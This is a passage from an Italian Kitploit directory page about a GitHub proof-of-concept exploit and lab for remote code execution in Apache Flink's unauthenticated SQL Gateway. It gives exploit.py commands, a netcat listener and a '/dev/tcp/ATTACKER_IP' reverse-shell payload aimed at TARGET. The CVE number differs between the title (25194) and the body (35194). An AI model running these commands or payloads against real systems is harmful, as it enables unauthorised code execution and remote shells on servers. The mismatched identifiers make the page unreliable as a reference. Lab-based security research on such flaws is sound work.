Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-25194 — Exploit proof-of-concept e ambiente di laboratorio per CVE-2026-25194 | Kitploit
Strumenti/GitHubGitHub/dexsemon/cve-2026-25194
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubdexsemon/cve-2026-25194

CVE-2026-25194

Exploit proof-of-concept e ambiente di laboratorio per CVE-2026-25194

Vedi Repository
1 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-35194 — Iniezione di codice SQL in Apache Flink

Esecuzione di codice remoto sui TaskManager di Apache Flink tramite iniezione nella generazione di codice SQL.

CVECVE-2026-35194
CVSS8.1 (Alto)
CWECWE-94 — Code Injection
Versione affettaFlink 1.15.0 – 1.20.3 / 2.0.0 – 2.2.0
Versione corretta1.20.4 / 2.0.2 / 2.1.2 / 2.2.1
Superficie d'attaccoAPI REST SQL Gateway (porta predefinita 8083, senza autenticazione)

Avvio Rapido

1. Distribuisci il Laboratorio Vulnerabile

root@kitploit:~
docker compose up -d

Attendi circa 30 secondi per l'avvio del cluster. Vengono avviati due servizi:

  • Flink Web UI — http://localhost:8081
  • SQL Gateway REST API — http://localhost:8083

Verifica:

root@kitploit:~
curl -s http://localhost:8083/v1/info
# Dovrebbe restituire la versione "1.20.3"

2. Installa le Dipendenze

root@kitploit:~
pip install requests

3. Exploit

Vettore JSON:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v json -c "id > /tmp/pwned"

Vettore LIKE:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v like -c "id > /tmp/pwned"

Solo controllo versione (nessun RCE):

root@kitploit:~
python3 exploit.py localhost -p 8083 --check-only

Verifica RCE su TaskManager:

root@kitploit:~
docker exec flink-taskmanager cat /tmp/pwned

4. Reverse Shell

root@kitploit:~
# Terminale 1 — listener
nc -lvnp 4444

# Terminale 2 — exploit
python3 exploit.py TARGET -p 8083 -v json \
  -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Utilizzo

root@kitploit:~
usage: exploit.py [-h] [-p PORT] [-c COMMAND] [-v {json,like}]
                  [--check-only] [-t TIMEOUT] [--cert CERT] [--key KEY] [--ssl]
                  target

Options:
  target              Target host (IP or hostname)
  -p, --port          SQL Gateway port (default: 8083)
  -c, --command       Shell command to run on TaskManager
  -v, --vector        json (default) or like
  --check-only        Version check only, no exploit
  -t, --timeout       Request timeout in seconds (default: 30)
  --cert / --key      Client cert + key for mTLS environments
  --ssl               Force HTTPS

Dichiarazione di non responsabilità

Solo per scopi di ricerca di sicurezza autorizzata e formativi.

Scarica lo strumento